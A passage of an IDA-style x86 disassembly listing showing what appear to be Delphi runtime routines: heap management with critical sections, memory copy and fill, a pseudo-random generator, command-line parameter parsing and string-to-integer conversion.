mov [ebp+var_14], eax
add ds:dword_407608, ebx
mov eax, ebx
or eax, 2
mov edx, [ebp+var_14]
mov [edx], eax
mov eax, [ebp+var_14]
add eax, 4
mov [ebp+var_4], eax
inc ds:dword_40759C
sub ebx, 4
add ds:dword_4075A0, ebx
call sub_403048
jmp short loc_40231B
; ---------------------------------------------------------------------------
loc_4022E9: ; CODE XREF: sub_402178+11C�j
mov eax, ebx
call sub_402030
mov [ebp+var_4], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40231B
loc_402300: ; CODE XREF: sub_402178+1A1�j
cmp ds:byte_407035, 0
jz short locret_402313
push offset dword_4075B4
call sub_401104 ; RtlLeaveCriticalSection
locret_402313: ; CODE XREF: sub_402178+18F�j
retn
; ---------------------------------------------------------------------------
loc_402314: ; DATA XREF: sub_402178+30�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_402300
; ---------------------------------------------------------------------------
loc_40231B: ; CODE XREF: sub_402178+28�j
; sub_402178+111�j ...
mov eax, [ebp+var_4]
pop ebx
mov esp, ebp
pop ebp
retn
sub_402178 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402324 proc near ; CODE XREF: sub_401C08+1C�p
; sub_402700+8D�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
mov ebx, eax
xor eax, eax
mov ds:dword_4075B0, eax
cmp ds:byte_4075AC, 0
jnz short loc_40235C
call sub_40191C
test al, al
jnz short loc_40235C
mov ds:dword_4075B0, 8
mov [ebp+var_4], 8
jmp loc_4024F2
; ---------------------------------------------------------------------------
loc_40235C: ; CODE XREF: sub_402324+17�j
; sub_402324+20�j
xor edx, edx
push ebp
push offset loc_4024EB
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp ds:byte_407035, 0
jz short loc_40237D
push offset dword_4075B4
call sub_4010FC ; RtlEnterCriticalSection
loc_40237D: ; CODE XREF: sub_402324+4D�j
mov [ebp+var_8], ebx
mov eax, [ebp+var_8]
sub eax, 4
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov ebx, [eax]
test bl, 2
jnz short loc_4023A2
mov ds:dword_4075B0, 9
jmp loc_4024C2
; ---------------------------------------------------------------------------
loc_4023A2: ; CODE XREF: sub_402324+6D�j
dec ds:dword_40759C
mov eax, ebx
and eax, 7FFFFFFCh
sub eax, 4
sub ds:dword_4075A0, eax
test bl, 1
jz short loc_402410
mov eax, [ebp+var_8]
sub eax, 0Ch
mov eax, [eax+8]
cmp eax, 0Ch
jl short loc_4023D2
test eax, 80000003h
jz short loc_4023E1
loc_4023D2: ; CODE XREF: sub_402324+A5�j
mov ds:dword_4075B0, 0Ah
jmp loc_4024C2
; ---------------------------------------------------------------------------
loc_4023E1: ; CODE XREF: sub_402324+AC�j
mov edx, [ebp+var_8]
sub edx, eax
mov [ebp+var_10], edx
mov edx, [ebp+var_10]
cmp eax, [edx+8]
jz short loc_402400
mov ds:dword_4075B0, 0Ah
jmp loc_4024C2
; ---------------------------------------------------------------------------
loc_402400: ; CODE XREF: sub_402324+CB�j
add ebx, eax
mov eax, [ebp+var_10]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
call sub_401AF4
loc_402410: ; CODE XREF: sub_402324+97�j
and ebx, 7FFFFFFCh
mov eax, [ebp+var_8]
add eax, ebx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
cmp eax, ds:dword_407608
jnz short loc_402455
sub ds:dword_407608, ebx
add ds:dword_407604, ebx
cmp ds:dword_407604, 3C00h
jle short loc_402446
call sub_401EC0
loc_402446: ; CODE XREF: sub_402324+11B�j
xor eax, eax
mov [ebp+var_4], eax
call sub_403048
jmp loc_4024F2
; ---------------------------------------------------------------------------
loc_402455: ; CODE XREF: sub_402324+103�j
mov eax, [ebp+var_C]
mov eax, [eax]
test al, 2
jz short loc_40247C
and eax, 7FFFFFFCh
cmp eax, 4
jge short loc_402474
mov ds:dword_4075B0, 0Bh
jmp short loc_4024C2
; ---------------------------------------------------------------------------
loc_402474: ; CODE XREF: sub_402324+142�j
mov eax, [ebp+var_C]
or dword ptr [eax], 1
jmp short loc_4024B8
; ---------------------------------------------------------------------------
loc_40247C: ; CODE XREF: sub_402324+138�j
mov eax, [ebp+var_C]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
cmp dword ptr [eax+4], 0
jz short loc_40249C
mov eax, [ebp+var_10]
cmp dword ptr [eax], 0
jz short loc_40249C
mov eax, [ebp+var_10]
cmp dword ptr [eax+8], 0Ch
jge short loc_4024A8
loc_40249C: ; CODE XREF: sub_402324+165�j
; sub_402324+16D�j
mov ds:dword_4075B0, 0Bh
jmp short loc_4024C2
; ---------------------------------------------------------------------------
loc_4024A8: ; CODE XREF: sub_402324+176�j
mov eax, [ebp+var_10]
mov eax, [eax+8]
add ebx, eax
mov eax, [ebp+var_10]
call sub_401AF4
loc_4024B8: ; CODE XREF: sub_402324+156�j
mov edx, ebx
mov eax, [ebp+var_8]
call sub_401DC8
loc_4024C2: ; CODE XREF: sub_402324+79�j
; sub_402324+B8�j ...
mov eax, ds:dword_4075B0
mov [ebp+var_4], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4024F2
loc_4024D7: ; CODE XREF: sub_402324+1CC�j
cmp ds:byte_407035, 0
jz short locret_4024EA
push offset dword_4075B4
call sub_401104 ; RtlLeaveCriticalSection
locret_4024EA: ; CODE XREF: sub_402324+1BA�j
retn
; ---------------------------------------------------------------------------
loc_4024EB: ; DATA XREF: sub_402324+3B�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_4024D7
; ---------------------------------------------------------------------------
loc_4024F2: ; CODE XREF: sub_402324+33�j
; sub_402324+12C�j
; DATA XREF: ...
mov eax, [ebp+var_4]
pop ebx
mov esp, ebp
pop ebp
retn
sub_402324 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4024FC proc near ; CODE XREF: sub_402700+4D�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov ebx, edx
add ebx, 7
and ebx, 0FFFFFFFCh
cmp ebx, 0Ch
jge short loc_402515
mov ebx, 0Ch
loc_402515: ; CODE XREF: sub_4024FC+12�j
sub eax, 4
mov [esp+1Ch+var_1C], eax
mov eax, [esp+1Ch+var_1C]
mov esi, [eax]
and esi, 7FFFFFFCh
mov eax, [esp+1Ch+var_1C]
add eax, esi
mov [esp+1Ch+var_18], eax
cmp esi, ebx
jnz short loc_40253A
mov al, 1
jmp loc_4026F7
; ---------------------------------------------------------------------------
loc_40253A: ; CODE XREF: sub_4024FC+35�j
cmp esi, ebx
jle loc_4025D2
mov ebp, esi
sub ebp, ebx
mov edx, [esp+1Ch+var_18]
cmp edx, ds:dword_407608
jnz short loc_40257E
sub ds:dword_407608, ebp
add ds:dword_407604, ebp
cmp ds:dword_407604, 0Ch
jge loc_4026DA
add ds:dword_407608, ebp
sub ds:dword_407604, ebp
mov ebx, esi
jmp loc_4026DA
; ---------------------------------------------------------------------------
loc_40257E: ; CODE XREF: sub_4024FC+54�j
mov [esp+1Ch+var_18], eax
mov eax, [esp+1Ch+var_18]
test byte ptr [eax], 2
jnz short loc_4025A3
mov eax, [esp+1Ch+var_18]
mov [esp+1Ch+var_14], eax
mov eax, [esp+1Ch+var_14]
add ebp, [eax+8]
mov eax, [esp+1Ch+var_14]
call sub_401AF4
loc_4025A3: ; CODE XREF: sub_4024FC+8D�j
cmp ebp, 0Ch
jl short loc_4025CB
mov eax, [esp+1Ch+var_1C]
add eax, ebx
mov [esp+1Ch+var_18], eax
or ebp, 2
mov eax, [esp+1Ch+var_18]
mov [eax], ebp
mov eax, [esp+1Ch+var_18]
add eax, 4
call sub_401C08
jmp loc_4026DA
; ---------------------------------------------------------------------------
loc_4025CB: ; CODE XREF: sub_4024FC+AA�j
mov ebx, esi
jmp loc_4026DA
; ---------------------------------------------------------------------------
loc_4025D2: ; CODE XREF: sub_4024FC+40�j
; sub_4024FC+1D5�j
mov edi, ebx
sub edi, esi
mov eax, [esp+1Ch+var_18]
cmp eax, ds:dword_407608
jnz short loc_402647
cmp edi, ds:dword_407604
jg short loc_402639
sub ds:dword_407604, edi
add ds:dword_407608, edi
cmp ds:dword_407604, 0Ch
jge short loc_402617
mov eax, ds:dword_407604
add ds:dword_407608, eax
add ebx, ds:dword_407604
xor eax, eax
mov ds:dword_407604, eax
loc_402617: ; CODE XREF: sub_4024FC+101�j
mov eax, ebx
sub eax, esi
add ds:dword_4075A0, eax
mov eax, [esp+1Ch+var_1C]
mov eax, [eax]
and eax, 80000003h
or ebx, eax
mov eax, [esp+1Ch+var_1C]
mov [eax], ebx
mov al, 1
jmp loc_4026F7
; ---------------------------------------------------------------------------
loc_402639: ; CODE XREF: sub_4024FC+EC�j
call sub_401EC0
mov eax, [esp+1Ch+var_1C]
add eax, esi
mov [esp+1Ch+var_18], eax
loc_402647: ; CODE XREF: sub_4024FC+E4�j
mov eax, [esp+1Ch+var_18]
test byte ptr [eax], 2
jnz short loc_40269F
mov eax, [esp+1Ch+var_18]
mov [esp+1Ch+var_14], eax
mov edx, [esp+1Ch+var_14]
mov ebp, [edx+8]
cmp edi, ebp
jle short loc_40266D
add eax, ebp
mov [esp+1Ch+var_18], eax
sub edi, ebp
jmp short loc_40269F
; ---------------------------------------------------------------------------
loc_40266D: ; CODE XREF: sub_4024FC+165�j
mov eax, [esp+1Ch+var_14]
call sub_401AF4
sub ebp, edi
cmp ebp, 0Ch
jl short loc_40268B
mov eax, [esp+1Ch+var_1C]
add eax, ebx
mov edx, ebp
call sub_401DC8
jmp short loc_4026DA
; ---------------------------------------------------------------------------
loc_40268B: ; CODE XREF: sub_4024FC+17F�j
add ebx, ebp
mov eax, [esp+1Ch+var_1C]
add eax, ebx
mov [esp+1Ch+var_18], eax
mov eax, [esp+1Ch+var_18]
and dword ptr [eax], 0FFFFFFFEh
jmp short loc_4026DA
; ---------------------------------------------------------------------------
loc_40269F: ; CODE XREF: sub_4024FC+152�j
; sub_4024FC+16F�j
mov eax, [esp+1Ch+var_18]
mov eax, [eax]
test eax, 80000000h
jz short loc_4026D6
and eax, 7FFFFFFCh
add eax, [esp+1Ch+var_18]
mov [esp+1Ch+var_18], eax
mov edx, edi
mov eax, [esp+1Ch+var_18]
call sub_401FC4
test al, al
jz short loc_4026D6
mov eax, [esp+1Ch+var_1C]
add eax, esi
mov [esp+1Ch+var_18], eax
jmp loc_4025D2
; ---------------------------------------------------------------------------
loc_4026D6: ; CODE XREF: sub_4024FC+1AE�j
; sub_4024FC+1CA�j
xor eax, eax
jmp short loc_4026F7
; ---------------------------------------------------------------------------
loc_4026DA: ; CODE XREF: sub_4024FC+69�j
; sub_4024FC+7D�j ...
mov eax, ebx
sub eax, esi
add ds:dword_4075A0, eax
mov eax, [esp+1Ch+var_1C]
mov eax, [eax]
and eax, 80000003h
or ebx, eax
mov eax, [esp+1Ch+var_1C]
mov [eax], ebx
mov al, 1
loc_4026F7: ; CODE XREF: sub_4024FC+39�j
; sub_4024FC+138�j ...
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4024FC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402700 proc near ; CODE XREF: sub_40281C+D�p
; DATA XREF: DATA:off_406030�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
mov esi, edx
mov ebx, eax
cmp ds:byte_4075AC, 0
jnz short loc_402728
call sub_40191C
test al, al
jnz short loc_402728
xor eax, eax
mov [ebp+var_4], eax
jmp loc_4027C0
; ---------------------------------------------------------------------------
loc_402728: ; CODE XREF: sub_402700+13�j
; sub_402700+1C�j
xor edx, edx
push ebp
push offset loc_4027B9
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp ds:byte_407035, 0
jz short loc_402749
push offset dword_4075B4
call sub_4010FC ; RtlEnterCriticalSection
loc_402749: ; CODE XREF: sub_402700+3D�j
mov edx, esi
mov eax, ebx
call sub_4024FC
test al, al
jz short loc_40275B
mov [ebp+var_4], ebx
jmp short loc_402798
; ---------------------------------------------------------------------------
loc_40275B: ; CODE XREF: sub_402700+54�j
mov eax, esi
call sub_402178
mov [ebp+var_8], eax
mov eax, ebx
sub eax, 4
mov eax, [eax]
and eax, 7FFFFFFCh
sub eax, 4
cmp esi, eax
jge short loc_40277A
mov eax, esi
loc_40277A: ; CODE XREF: sub_402700+76�j
cmp [ebp+var_8], 0
jz short loc_402792
mov edx, [ebp+var_8]
mov ecx, ebx
xchg eax, ecx
call sub_4028E0
mov eax, ebx
call sub_402324
loc_402792: ; CODE XREF: sub_402700+7E�j
mov eax, [ebp+var_8]
mov [ebp+var_4], eax
loc_402798: ; CODE XREF: sub_402700+59�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4027C0
loc_4027A5: ; CODE XREF: sub_402700+BE�j
cmp ds:byte_407035, 0
jz short locret_4027B8
push offset dword_4075B4
call sub_401104 ; RtlLeaveCriticalSection
locret_4027B8: ; CODE XREF: sub_402700+AC�j
retn
; ---------------------------------------------------------------------------
loc_4027B9: ; DATA XREF: sub_402700+2B�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_4027A5
; ---------------------------------------------------------------------------
loc_4027C0: ; CODE XREF: sub_402700+23�j
; DATA XREF: sub_402700+A0�o
mov eax, [ebp+var_4]
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_402700 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4027CC proc near ; CODE XREF: sub_4035B0+C�p
; CODE:00404E24�p
var_8 = dword ptr -8
push ebx
push ecx
mov ebx, eax
test ebx, ebx
jle short loc_4027EE
mov eax, ebx
call ds:off_406028
mov [esp+8+var_8], eax
cmp [esp+8+var_8], 0
jnz short loc_4027F3
mov al, 1
call sub_4028C4
; ---------------------------------------------------------------------------
jmp short loc_4027F3
; ---------------------------------------------------------------------------
loc_4027EE: ; CODE XREF: sub_4027CC+6�j
xor eax, eax
mov [esp+8+var_8], eax
loc_4027F3: ; CODE XREF: sub_4027CC+17�j
; sub_4027CC+20�j
mov eax, [esp+8+var_8]
pop edx
pop ebx
retn
sub_4027CC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4027FC proc near ; CODE XREF: sub_403518+1C�p
; sub_40353C+21�p ...
push ebx
test eax, eax
jz short loc_402816
call ds:off_40602C
mov ebx, eax
test ebx, ebx
jz short loc_402818
mov al, 2
call sub_4028C4
; ---------------------------------------------------------------------------
jmp short loc_402818
; ---------------------------------------------------------------------------
loc_402816: ; CODE XREF: sub_4027FC+3�j
xor ebx, ebx
loc_402818: ; CODE XREF: sub_4027FC+F�j
; sub_4027FC+18�j
mov eax, ebx
pop ebx
retn
sub_4027FC endp
; =============== S U B R O U T I N E =======================================
sub_40281C proc near ; CODE XREF: sub_403734+22�p
mov ecx, [eax]
test ecx, ecx
jz short loc_402854
test edx, edx
jz short loc_40283E
push eax
mov eax, ecx
call ds:off_406030
pop ecx
or eax, eax
jz short loc_40284D
mov [ecx], eax
retn
; ---------------------------------------------------------------------------
loc_402837: ; CODE XREF: sub_40281C+2E�j
mov al, 2
jmp sub_4028C4
; ---------------------------------------------------------------------------
loc_40283E: ; CODE XREF: sub_40281C+8�j
mov [eax], edx
mov eax, ecx
call ds:off_40602C
or eax, eax
jnz short loc_402837
retn
; ---------------------------------------------------------------------------
loc_40284D: ; CODE XREF: sub_40281C+16�j
; sub_40281C+48�j
mov al, 1
jmp sub_4028C4
; ---------------------------------------------------------------------------
loc_402854: ; CODE XREF: sub_40281C+4�j
test edx, edx
jz short locret_402868
push eax
mov eax, edx
call ds:off_406028
pop ecx
or eax, eax
jz short loc_40284D
mov [ecx], eax
locret_402868: ; CODE XREF: sub_40281C+3A�j
retn
sub_40281C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40286C proc near ; CODE XREF: sub_402878+42�p
; CODE:004030F7�p
mov ds:dword_406004, edx
call sub_403500
sub_40286C endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_402878 proc near ; CODE XREF: sub_4028C4+6�j
push ebx
push esi
mov esi, edx
mov ebx, eax
and bl, 7Fh
cmp ds:dword_407008, 0
jz short loc_402894
mov edx, esi
mov eax, ebx
call ds:dword_407008
loc_402894: ; CODE XREF: sub_402878+10�j
test bl, bl
jnz short loc_4028A5
call sub_403C48
mov ebx, [eax+4]
jmp short loc_4028B4
; ---------------------------------------------------------------------------
loc_4028A5: ; CODE XREF: sub_402878+1E�j
cmp bl, 18h
ja short loc_4028B4
xor eax, eax
mov al, bl
mov bl, ds:byte_406034[eax]
loc_4028B4: ; CODE XREF: sub_402878+2B�j
; sub_402878+30�j
xor eax, eax
mov al, bl
mov edx, esi
call sub_40286C
sub_402878 endp
; ---------------------------------------------------------------------------
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4028C4 proc near ; CODE XREF: sub_4027CC+1B�p
; sub_4027FC+13�p ...
and eax, 7Fh
mov edx, [esp+0]
jmp sub_402878
sub_4028C4 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4028D0 proc near ; CODE XREF: sub_402AF4+38�p
; sub_402AF4+4C�p
push ebx
mov ebx, eax
call sub_403C48
mov [eax+4], ebx
pop ebx
retn
sub_4028D0 endp
; =============== S U B R O U T I N E =======================================
sub_4028E0 proc near ; CODE XREF: sub_402700+86�p
; sub_40356C+1B�p ...
push esi
push edi
mov esi, eax
mov edi, edx
mov eax, ecx
cmp edi, esi
ja short loc_4028FF
jz short loc_40291D
sar ecx, 2
js short loc_40291D
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4028FF: ; CODE XREF: sub_4028E0+A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
sar ecx, 2
js short loc_40291D
std
rep movsd
mov ecx, eax
and ecx, 3
add esi, 3
add edi, 3
rep movsb
cld
loc_40291D: ; CODE XREF: sub_4028E0+C�j
; sub_4028E0+11�j ...
pop edi
pop esi
retn
sub_4028E0 endp
; =============== S U B R O U T I N E =======================================
sub_402920 proc near ; CODE XREF: sub_402A84+44�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFE8h
mov [esp+28h+var_24], edx
mov [esp+28h+var_28], eax
mov esi, esp
lea edi, [esp+28h+var_14]
jmp short loc_402940
; ---------------------------------------------------------------------------
loc_402936: ; CODE XREF: sub_402920+2B�j
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [esi], eax
loc_402940: ; CODE XREF: sub_402920+14�j
; sub_402920+3F�j
mov eax, [esi]
mov bl, [eax]
test bl, bl
jz short loc_40294D
cmp bl, 20h
jbe short loc_402936
loc_40294D: ; CODE XREF: sub_402920+26�j
mov eax, [esi]
cmp byte ptr [eax], 22h
jnz short loc_402961
mov eax, [esi]
cmp byte ptr [eax+1], 22h
jnz short loc_402961
add dword ptr [esi], 2
jmp short loc_402940
; ---------------------------------------------------------------------------
loc_402961: ; CODE XREF: sub_402920+32�j
; sub_402920+3A�j
xor ebp, ebp
mov eax, [esi]
mov [esp+28h+var_1C], eax
jmp short loc_4029C6
; ---------------------------------------------------------------------------
loc_40296B: ; CODE XREF: sub_402920+AB�j
mov eax, [esi]
cmp byte ptr [eax], 22h
jnz short loc_4029B2
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [esi], eax
jmp short loc_402992
; ---------------------------------------------------------------------------
loc_40297E: ; CODE XREF: sub_402920+7D�j
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [edi], eax
mov eax, [edi]
sub eax, [esi]
add ebp, eax
mov eax, [edi]
mov [esi], eax
loc_402992: ; CODE XREF: sub_402920+5C�j
mov eax, [esi]
mov bl, [eax]
test bl, bl
jz short loc_40299F
cmp bl, 22h
jnz short loc_40297E
loc_40299F: ; CODE XREF: sub_402920+78�j
mov eax, [esi]
cmp byte ptr [eax], 0
jz short loc_4029C6
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [esi], eax
jmp short loc_4029C6
; ---------------------------------------------------------------------------
loc_4029B2: ; CODE XREF: sub_402920+50�j
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [edi], eax
mov eax, [edi]
sub eax, [esi]
add ebp, eax
mov eax, [edi]
mov [esi], eax
loc_4029C6: ; CODE XREF: sub_402920+49�j
; sub_402920+84�j ...
mov eax, [esi]
cmp byte ptr [eax], 20h
ja short loc_40296B
mov eax, [esp+28h+var_24]
mov edx, ebp
call sub_403734
mov eax, [esp+28h+var_1C]
mov [esi], eax
mov eax, [esp+28h+var_24]
mov eax, [eax]
mov [esp+28h+var_18], eax
xor ebp, ebp
jmp short loc_402A67
; ---------------------------------------------------------------------------
loc_4029EC: ; CODE XREF: sub_402920+14C�j
mov eax, [esi]
cmp byte ptr [eax], 22h
jnz short loc_402A43
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [esi], eax
jmp short loc_402A23
; ---------------------------------------------------------------------------
loc_4029FF: ; CODE XREF: sub_402920+10E�j
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [edi], eax
mov eax, [esi]
cmp eax, [edi]
jnb short loc_402A23
loc_402A0F: ; CODE XREF: sub_402920+101�j
mov eax, [esi]
mov al, [eax]
mov edx, [esp+28h+var_18]
mov [edx+ebp], al
inc dword ptr [esi]
inc ebp
mov eax, [esi]
cmp eax, [edi]
jb short loc_402A0F
loc_402A23: ; CODE XREF: sub_402920+DD�j
; sub_402920+ED�j
mov eax, [esi]
mov bl, [eax]
test bl, bl
jz short loc_402A30
cmp bl, 22h
jnz short loc_4029FF
loc_402A30: ; CODE XREF: sub_402920+109�j
mov eax, [esi]
cmp byte ptr [eax], 0
jz short loc_402A67
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [esi], eax
jmp short loc_402A67
; ---------------------------------------------------------------------------
loc_402A43: ; CODE XREF: sub_402920+D1�j
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [edi], eax
mov eax, [esi]
cmp eax, [edi]
jnb short loc_402A67
loc_402A53: ; CODE XREF: sub_402920+145�j
mov eax, [esi]
mov al, [eax]
mov edx, [esp+28h+var_18]
mov [edx+ebp], al
inc dword ptr [esi]
inc ebp
mov eax, [esi]
cmp eax, [edi]
jb short loc_402A53
loc_402A67: ; CODE XREF: sub_402920+CA�j
; sub_402920+115�j ...
mov eax, [esi]
cmp byte ptr [eax], 20h
ja loc_4029EC
mov eax, [esi]
mov [esp+28h+var_20], eax
mov eax, [esp+28h+var_20]
add esp, 18h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_402920 endp
; =============== S U B R O U T I N E =======================================
sub_402A84 proc near ; CODE XREF: CODE:00404E6C�p
var_114 = dword ptr -114h
var_110 = byte ptr -110h
push ebx
push esi
add esp, 0FFFFFEF4h
mov ebx, edx
mov esi, eax
mov eax, ebx
call sub_403518
test esi, esi
jnz short loc_402ABB
push 105h
lea eax, [esp+118h+var_110]
push eax
push 0
call sub_401058 ; GetModuleFileNameA
mov ecx, eax
lea edx, [esp+114h+var_110]
mov eax, ebx
call sub_4035DC
jmp short loc_402ADC
; ---------------------------------------------------------------------------
loc_402ABB: ; CODE XREF: sub_402A84+15�j
call sub_401048 ; GetCommandLineA
mov [esp+114h+var_114], eax
loc_402AC3: ; CODE XREF: sub_402A84+56�j
mov edx, ebx
mov eax, [esp+114h+var_114]
call sub_402920
mov [esp+114h+var_114], eax
test esi, esi
jz short loc_402ADC
cmp dword ptr [ebx], 0
jz short loc_402ADC
dec esi
jmp short loc_402AC3
; ---------------------------------------------------------------------------
loc_402ADC: ; CODE XREF: sub_402A84+35�j
; sub_402A84+4E�j ...
add esp, 10Ch
pop esi
pop ebx
retn
sub_402A84 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402AE8 proc near ; CODE XREF: sub_4042A4+81�p
var_8 = qword ptr -8
sub esp, 8
fistp [esp+8+var_8]
wait
pop eax
pop edx
retn
sub_402AE8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402AF4 proc near ; CODE XREF: sub_403A90+1E�p
; sub_403A90+28�p ...
push ebx
push esi
mov ebx, eax
xor esi, esi
mov ax, [ebx+4]
cmp ax, 0D7B1h
jb short loc_402B33
cmp ax, 0D7B3h
ja short loc_402B33
and ax, 0D7B2h
cmp ax, 0D7B2h
jnz short loc_402B1B
mov eax, ebx
call dword ptr [ebx+1Ch]
mov esi, eax
loc_402B1B: ; CODE XREF: sub_402AF4+1E�j
test esi, esi
jnz short loc_402B26
mov eax, ebx
call dword ptr [ebx+24h]
mov esi, eax
loc_402B26: ; CODE XREF: sub_402AF4+29�j
test esi, esi
jz short loc_402B45
mov eax, esi
call sub_4028D0
jmp short loc_402B45
; ---------------------------------------------------------------------------
loc_402B33: ; CODE XREF: sub_402AF4+E�j
; sub_402AF4+14�j
cmp ebx, offset dword_407038
jz short loc_402B45
mov eax, 67h
call sub_4028D0
loc_402B45: ; CODE XREF: sub_402AF4+34�j
; sub_402AF4+3D�j ...
mov eax, esi
pop esi
pop ebx
retn
sub_402AF4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402B4C proc near ; CODE XREF: sub_403E54+43�p
; sub_403E54+53�p
push edi
mov edi, eax
mov ch, cl
mov eax, ecx
shl eax, 10h
mov ax, cx
mov ecx, edx
sar ecx, 2
js short loc_402B69
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_402B69: ; CODE XREF: sub_402B4C+12�j
pop edi
retn
sub_402B4C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402B6C proc near ; CODE XREF: CODE:00404629�p
; CODE:00404639�p ...
push ebx
xor ebx, ebx
imul edx, ds:dword_406008[ebx], 8088405h
inc edx
mov ds:dword_406008[ebx], edx
mul edx
mov eax, edx
pop ebx
retn
sub_402B6C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402B88 proc near ; CODE XREF: sub_403A1C+41�p
push ebx
push esi
push edi
mov esi, eax
push eax
test eax, eax
jz short loc_402BFE
xor eax, eax
xor ebx, ebx
mov edi, 0CCCCCCCh
loc_402B9B: ; CODE XREF: sub_402B88+19�j
mov bl, [esi]
inc esi
cmp bl, 20h
jz short loc_402B9B
mov ch, 0
cmp bl, 2Dh
jz short loc_402C0C
cmp bl, 2Bh
jz short loc_402C0E
loc_402BAF: ; CODE XREF: sub_402B88+89�j
cmp bl, 24h
jz short loc_402C13
cmp bl, 78h
jz short loc_402C13
cmp bl, 58h
jz short loc_402C13
cmp bl, 30h
jnz short loc_402BD6
mov bl, [esi]
inc esi
cmp bl, 78h
jz short loc_402C13
cmp bl, 58h
jz short loc_402C13
test bl, bl
jz short loc_402BF4
jmp short loc_402BDA
; ---------------------------------------------------------------------------
loc_402BD6: ; CODE XREF: sub_402B88+39�j
test bl, bl
jz short loc_402C07
loc_402BDA: ; CODE XREF: sub_402B88+4C�j
; sub_402B88+6A�j
sub bl, 30h
cmp bl, 9
ja short loc_402C07
cmp eax, edi
ja short loc_402C07
lea eax, [eax+eax*4]
add eax, eax
add eax, ebx
mov bl, [esi]
inc esi
test bl, bl
jnz short loc_402BDA
loc_402BF4: ; CODE XREF: sub_402B88+4A�j
dec ch
jz short loc_402C01
test eax, eax
jge short loc_402C50
jmp short loc_402C07
; ---------------------------------------------------------------------------
loc_402BFE: ; CODE XREF: sub_402B88+8�j
; sub_402B88+95�j
inc esi
jmp short loc_402C07
; ---------------------------------------------------------------------------
loc_402C01: ; CODE XREF: sub_402B88+6E�j
neg eax
jle short loc_402C50
js short loc_402C50
loc_402C07: ; CODE XREF: sub_402B88+50�j
; sub_402B88+58�j ...
pop ebx
sub esi, ebx
jmp short loc_402C53
; ---------------------------------------------------------------------------
loc_402C0C: ; CODE XREF: sub_402B88+20�j
inc ch
loc_402C0E: ; CODE XREF: sub_402B88+25�j
mov bl, [esi]
inc esi
jmp short loc_402BAF
; ---------------------------------------------------------------------------
loc_402C13: ; CODE XREF: sub_402B88+2A�j
; sub_402B88+2F�j ...
mov edi, 0FFFFFFFh
mov bl, [esi]
inc esi
test bl, bl
jz short loc_402BFE
loc_402C1F: ; CODE XREF: sub_402B88+C0�j
cmp bl, 61h
jb short loc_402C27
sub bl, 20h
loc_402C27: ; CODE XREF: sub_402B88+9A�j
sub bl, 30h
cmp bl, 9
jbe short loc_402C3A
sub bl, 11h
cmp bl, 5
ja short loc_402C07
add bl, 0Ah
loc_402C3A: ; CODE XREF: sub_402B88+A5�j
cmp eax, edi
ja short loc_402C07
shl eax, 4
add eax, ebx
mov bl, [esi]
inc esi
test bl, bl
jnz short loc_402C1F
